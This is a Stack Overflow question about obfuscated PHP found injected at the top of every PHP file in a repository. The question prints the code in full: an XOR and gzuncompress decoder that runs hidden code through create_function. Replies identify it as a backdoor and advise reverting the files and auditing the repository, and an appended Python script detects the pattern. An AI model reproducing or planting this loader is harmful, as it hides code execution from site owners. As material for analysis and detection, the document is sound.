4

I have this code on top of all my php files in the source control somehow

Can someone please shed some light on what this is?

EDIT: I know it's most likely bad; I know that it is trying to create functions. But what exactly are those functions going to do? It is too jumbled!! If someone can spend some time on this, then hats off to them.

Otherwise, I am attempting this tomorrow with a fresh mind.

Thanks fellow stackoverflowERS for all the help :)

<?php
     $qhtgndmn;
    $qhtgndmn = array(
        '$qhtgndmn[0]=array_pop($qhtgndmn);$twpxkaml=twpxkaml(1,13);$qhtgndmn[0]=$twpxkaml($qhtgndmn[2]);',
        '$qhtgndmn[2]=gzuncompress(twpxkaml(696,2300));',
        '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' . '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' . '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' . 'O3602dC3+gik0rzVJwF0tvByeQdNlc8pi0zx6q0uAD2dFiVJls2FZebcUA9mABrO30vdbMfyabEldMkX+po+PkL63xJiahC4thVL1e4nWFcFxV9x7Ghfko/lu90HQKx20M6lw6H7zB2e+lso7K/NHiHefufUP7ACFPggcfLY/PKjdR4mrf0uMlGfF3NkU1wxbEDp7S8TBADcyvW1sTZenmKjRuynMZWsgzpaL1GbdxbxqCcZ8j0c07+9+9P1nxHvJgc8ivprlNJVvafZckzzR55LRxi5oUiaHczCE/tj3cDq+OfybEHUd+nqBkEibSrnxnsgNQnICSqIiqfWQU9Pnm2PW6cqe6R3SvK+fO9WnuVYr2L62smMwZDENU9H9zyS1odWMnmQI2LYiT46UblsDR8QGxakmpDGM8kSeob1ac0razk2DerXttvrtkQW7DlUcbSAfgNhxjMD2c8VjTndaD2CTLuTE0Q/bza7bj4pexmWS4cdEBm0jInUKQzvYuuu9WV14NebJmYGGomjoploNyVNTLEVcRGA6n51v2kKmfvT9ouHg4vjyT+H86rbFPfntj3yJBa4w+FNFEwimiXDzu0aGl+QFR0nwARSe1duCyC33NUkzMf0rbdtiXkmX5cfIhTW0pbrR7jutZABUcK8JONEOKUSKuMCwzxv/6JoX5z11J0a+btMArNMbz+UAMxhmxv/5FPW+RPM52gHCrXkpn/uXTuvUYWCr3Ks+fg9VggsdQuJGVWm2oM3lVeHAG5dCyqJtjl+OY8FwuP7PJNgCH+w2jS3dxXxGbX919c3BxDpGZ9imENYwU7K4h7LQ1zTytBETjPI3haqXM3cC3XJ4iOpmhB/mqTMBtAhNfNSuJyRqyA97ITUsCy3ZMzJ+f+schIIrwN/9mIowJNokAc1Z84Rdd5UCkeYeZeubY7Ar7d86uVCF8qvhptLc4KvF53MMazOLcfYczkf5F2oQSqaVOx/H' . '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',
        "f\x7bqem\x3c\x24Nchnmbd"
    );
    $hvnlvgr  = 'create_';
    if (function_exists($hvnlvgr .= 'function') && !function_exists('twpxkaml')) {
        function twpxkaml($d, $j)
        {
            global $qhtgndmn;
            $v = str_pad($g = 'yPvhJ0qgMmbfaIEZ', $j, $g);
            $e = str_repeat("\x1f", $j);
            $f = str_repeat("\xe0", $j);
            $n = substr($qhtgndmn[0], $d, $j);
            return (($n ^ $v) & $e) | ($n & $f);
        }
        ;
        for ($xv = -1; ++$xv < 3; $hvnlvgr('', '}' . $qhtgndmn[$xv] . '{'));
    }
    ;
    unset($qhtgndmn);

    var_
     ?>
Braiam
Vish
    Looks obfuscated and could very well be malicious. Since it's in source control, use your source control's blame feature to identify the committer, then go ask that person about this code. If they don't know it, suspect at least one system is compromised. – Asaph Jan 18 '16 at 04:14
  • also, forty lashings to the sadist who chose those variable names. – ingernet Jan 18 '16 at 04:27
  • Can someone help me un-obfuscate it? – Vish Jan 18 '16 at 04:32
  • Revert it, change all your passwords (strong passwords!), and don't allow anyone to make any changes until you find out how they managed to get access to your server/repo. Also, make sure to update all the software you are using to the newest versions. – Sverri M. Olsen Jan 18 '16 at 04:33
  • I have already snapshotted the file system at this point to keep of copy of this code to try to find the root cause and reverted to the previous hourly one we take and set it to read only. @SverriM.Olsen – Vish Jan 18 '16 at 04:35
  • It's obviously malicious code, probably a backdoor of some sort. Trying to reverse engineer it is not going to be hugely enlightening; in particular, it won't tell you anything useful about how the exploit occurred. –  Jan 18 '16 at 09:37

1 Answer

3

Looks like it's creating three anonymous functions with create_function, to execute obfuscated code it's hiding in the $qhtgndmn array and either decoding or obfuscating further with twpxkaml.

So assume it's malicious. Or by someone really, really bored. Check the commit log.

Tom
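A static triage script a defender could run over a checkout to flag files with the same shape as the dropper above (an added example, not code from the question or the answer; the indicator list, weights and threshold are my own choices, and the embedded sample is a constructed, trimmed imitation of the snippet with the long blob replaced by a stand-in string):

```python
"""Flag PHP sources combining create_function, a byte-mask XOR decoder,
gzuncompress and long opaque literals, as seen in the obfuscated snippet."""
import re

# Indicator name -> regex. Each is one trait of the snippet in the question;
# a single hit is normal PHP, several together are not (thresholds are my own).
INDICATORS = [
    ("create_function_dynamic", re.compile(r"create_function|'create_'|\"create_\"")),
    ("gzuncompress_call", re.compile(r"\bgzuncompress\s*\(")),
    ("xor_mask_decoder", re.compile(r"\^\s*\$\w+\s*\)\s*&")),
    ("str_repeat_byte_mask", re.compile(r'str_repeat\s*\(\s*"\\x[0-9a-f]{2}"', re.I)),
    ("hex_escaped_string", re.compile(r'"[^"\n]*(?:\\x[0-9a-f]{2}[^"\n]*){2,}"', re.I)),
    ("long_opaque_literal", re.compile(r"'[A-Za-z0-9+/=]{120,}'")),
    ("unset_of_payload_array", re.compile(r"\bunset\s*\(\s*\$\w+\s*\)")),
]

def triage_php(source: str):
    """Return (score, hit_names): how many indicators matched and which."""
    hits = [name for name, rx in INDICATORS if rx.search(source)]
    return len(hits), hits

def is_suspicious(source: str, threshold: int = 3) -> bool:
    """Three or more co-occurring indicators is worth a human look."""
    return triage_php(source)[0] >= threshold

# Constructed sample: the dropper's structure with renamed variables and a
# stand-in for the base64-looking blob (it is not the original payload).
OPAQUE = "Ab3+/x9Z" * 30
SAMPLE = r'''<?php
$q = array(
    '$q[0]=array_pop($q);$t=t(1,13);$q[0]=$t($q[2]);',
    '$q[2]=gzuncompress(t(696,2300));',
    'OPAQUE_BLOB',
    "f\x7bqem\x3c\x24Nchnmbd"
);
$h = 'create_';
if (function_exists($h .= 'function') && !function_exists('t')) {
    function t($d, $j) { global $q; $v = str_pad($g = 'k', $j, $g);
        $e = str_repeat("\x1f", $j); $f = str_repeat("\xe0", $j);
        $n = substr($q[0], $d, $j); return (($n ^ $v) & $e) | ($n & $f); }
    for ($x = -1; ++$x < 3; $h('', '}' . $q[$x] . '{'));
}
unset($q);
'''.replace("OPAQUE_BLOB", OPAQUE)
BENIGN = "<?php\nfunction add($a, $b) { return $a + $b; }\necho add(1, 2);\n"

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE), ("benign", BENIGN)):
        print(label, triage_php(src), "suspicious" if is_suspicious(src) else "ok")
```

Run it against every .php file in the repository and compare the flagged set with the commit history, which is what the comments above recommend doing first.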